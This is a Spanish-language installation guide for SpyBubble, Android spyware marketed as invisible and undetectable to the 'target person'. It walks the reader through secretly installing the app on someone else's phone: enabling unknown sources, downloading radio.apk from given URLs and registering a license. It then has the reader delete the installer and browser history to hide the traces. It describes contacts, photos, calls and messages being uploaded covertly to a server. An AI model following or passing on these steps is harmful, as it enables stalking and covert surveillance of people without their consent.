Android

androidsimpleInstalación en Teléfonos Android

Esta guía le dará instrucciones completas y detalladas para que empiece a obtener la información que tanto necesita. El proceso de instalación es muy simple y requiere tan sólo de unos cuantos minutos. Una vez instalado, podrá usar todas las funciones de SpyBubble.

Recuerde, SpyBubble es el programa de espionaje de teléfonos Android que es completamente invisible e indetectable por la persona objetivo. Sabemos que el tipo de información que necesita es extremadamente sensible y es por eso que hemos hecho rigorosas pruebas a nuestro software en cada circunstancia imaginable para asegurarnos que cuenta con una herramienta altamente efectiva y completamente discreta a su disposición.

Proceso de Instalación

Nota: No necesita conectar el teléfono a la computadora para instalar SpyBubble en él.

1. En el teléfono objetivo, presione la tecla Home. Luego seleccione Settings y luego Apliccations . Active la opción Unknown Sources .

a1

2. Ahora elija la versión spybubble de acuerdo a su modelo de teléfono de destino de la siguiente manera.

1. Si su teléfono objetivo es cualquier teléfono Motorola / Teléfono LG / HTC EVO 4G use: http://www.spybubble.com/android/lite/radio.apk
Para cualquier otro modelo use: http://www.spybubble.com/android/radio.apk.

En cualquier caso, abra el navegador web en su teléfono. En la barra de direcciones, teclee el link que haya escogido y después haga click en Go. El archivo de aplicación se guardará en su teléfono.

a2

Por favor note que si escoge bajar la versión corta (1er enlace en el paso 2), los contactos y las fotos serán cargados en el servidor a medianoche (de 12 AM a 4 AM) cuando el teléfono no se esté usando.

3. Ahora abra el navegador web del teléfono. Presione en Menu y haga click en más. Deberá ver la opción descargas. Haga click en esta opción y deberá ver el archivo radio.apk, el cual se descargó en el paso 2. Haga click en el archivo apk. Deberá empezar la instalación. Si esto no funciona, necesita instalar APKInstaller.

4. Una vez que haya instalado SpyBubble, apague y encienda otra vez su teléfono para reanudarlo. Tan sólo espere unos segundos mientras aparece en la pantalla el paso 5.

5. Haga click en el botón de Acepto para aceptar los Términos y Condiciones.

a3

6. Finalmente, necesita registrar su número de licencia . Introduzca su número de licencia y Haga clic aquí    en el botón Submit. Haga click aquí si no sabe cual es su número de licencia.

Por favor tome en cuenta que tal vez tenga que esperar unos segundos después de hacer click en el botón SUBMIT antes de que vea el mensaje.

a4

a5

NOTAS IMPORTANTES

• Desinstalar el Archivo de Instalación : Abra el navegador de Internet y vaya a Menu->More->Downloads . Verá el archivo de instalación radio.apk. Mantenga presionado su dedo en esta opción hasta que aparezca un menú. De las opciones disponibles, escoja Clear from List and Delete.

• Borrar el Enlace de Descarga : Para hacer esto, debe abrir el navegador de Internet e ir a Menu->More->History. Verá la opción SpyBubble.com. Mantenga presionado su dedo en esa opción hasta que aparezca un menú. De las opciones disponibles, escoja Remove from History.

Usted está ahora listo para usar SpyBubble. Llame al teléfono y envíe unos mensajes de texto. Los registros de estos empezarán a aparecer en su cuenta después de unos cuantos minutos. Para verificar que las llamadas y los mensajes han sido registrados, conéctese al sistema desde cualquier computadora con acceso a Internet.

DESINSTALANDO SPYBUBBLE

Para desinstalar SpyBubble del teléfono objetivo, siga los siguientes pasos:

1. En el menú, haga click en Ajustes.

a6

2. Haga click en el menú Applications .

a7

3. Haga click en el menú Manage Applications .

a8

4. Esta página incluye todas las aplicaciones instaladas. Haga click en radio.

a9

5. Haga click en el menú Uninstall.

a10

6. La siguiente pantalla le pedirá confirmación. Haga click en el botón Ok.

a11

7. SpyBubble será borrado del teléfono objetivo.

a12

a13